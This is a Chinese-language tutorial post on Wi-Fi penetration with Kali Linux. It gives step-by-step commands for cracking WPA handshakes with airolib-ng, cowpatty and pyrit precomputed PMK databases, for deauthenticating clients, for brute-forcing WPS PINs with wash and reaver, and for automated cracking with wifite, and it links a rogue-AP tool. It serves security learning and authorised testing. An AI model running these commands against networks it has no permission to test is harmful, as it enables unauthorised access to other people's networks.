kali linux之無線滲透(續)


Airolib

設計用於存儲ESSID和密碼列表,計算生成不變的PMK(計算資源消耗型)

 PMK在破解階段被用於計算PTK(速度快,計算資源要求少)

 通過完整性摘要值破解密碼SQLite3數據庫存儲數據

 

實例:

抓包獲取四步信息

echo 目標ESSID > essid.txt(創建一個ESSID文件)
airolib-ng db --import essid essid.txt(創建一個數據庫db,導入一個essid,這個essid文件存在essid.txt文件里)
airolib-ng db --stats(查看數據庫狀態)
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(導入密碼文件,它會剔除不合格的密碼)
airolib-ng db --batch(生成PMK)
aircrack-ng -r db test-01.cap(通過抓取到的包對比db數據庫里面的PMK破解密碼)

 

 

 

 

 

Cowpatty破解密碼

一樣的,先抓包獲取四步信息

cowpatty -r xx-01.cap -f password.txt -s 目標essid (-r 指定抓到包的文件,-f 使用的字典,-s 目標essid)

使用彩虹表(PMK)

genpmk -f password.txt -d pmk -s 目標essid (-f 使用的字典 -d生成的pmk文件名 -s 目標essid)

cowpatty -r xx-01.cap -d pmk -s 目標essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目標essid)

 

 

 

Pyrit破解密碼

與airolib,cowpatty相同,支持基於預計算的pmk提高破解速度

獨有的優勢:

CPU外,可以運用GPU的計算能力加速生成PMK,本身支持抓包獲取四步握手過程,無需airodump抓包

也支持傳統的讀取airodump抓包獲取四步握手的方式

 

 

實例:

pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的網卡,-o 輸出文件名 stripLive是踢出多余的信息)

 

然后配合aireplay-ng把目標打掉,獲取四步信息

 

 

會生成一個抓包文件

 

 分析包(analyze)

 

 從airodump抓包導入並篩選提取出新的包,剔除多余的信息

會生成新的包

 

可以直接用密碼字典破解,但是沒靈魂,使用數據庫模式破解

默認基於文件的數據庫,支持sql數據庫,將計算的PMK存入數據庫

查看默認數據庫狀態:pyrit eval

導入密碼字典:pyrit -i password.txt import_passwords(會剔除不合格的密碼)

指定ESSID:pyrit -e ESSID名 create_essid (創建essid)

計算PMK:pyrit batch (發揮GPU計算能力)

破解密碼:pyrit -r wap01.cap -b APmac attack_db

 

 

實例:

 導入密碼文件

 

 查看可用密碼文件

 

 創建essid

 

計算PMK

 

破解密碼

 

 

 

 

 

WPS攻擊

WPS是wifi聯盟2006年開發的一項技術,通過pin碼來簡化無線接入的操作,無需記住PSK,路由器和網卡名各按一個按鈕就能接入無線.pin碼是分為前后各4位的2段共8位數字

 

2011年被發現安全漏洞,接入發起方可以根據路由器的返回信息判斷前4位是否正確,而pin碼的后四位只有1000種定義的組合(最后一位是checksum),所以全部窮舉破解只需要11000次嘗試,(PSK 218,340,105,584,896),標准本身沒有設定鎖定機制,目前多個廠商已實現鎖定機制

 

 

wash -i wlan0mon (發現支持wps的無線)

 

 airodump-ng wlan0mon --wps (也可以加上--wps參數)

 

 爆破PIN碼

reaver -i wlan0mon -b APmac -vv

 

爆破出pin碼后

reaver -i wlan0mon -b APmac -vv -p PIN碼

 

 

 

  綜合自動化無線密碼破解工具:wifite

 

 

ctrl+c停止掃描,選擇目標

 

它會自動逐個嘗試,WPS,握手包等等

 

 

 

 

 

 

 

 

偽造AP:3vilTwinAttacker  https://github.com/wi-fi-analyzer/3vilTwinAttacker.git

 

 

 

 

友情鏈接  http://www.cnblogs.com/klionsec

                http://www.cnblogs.com/l0cm

                http://www.cnblogs.com/Anonyaptxxx

                http://www.feiyusafe.cn

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM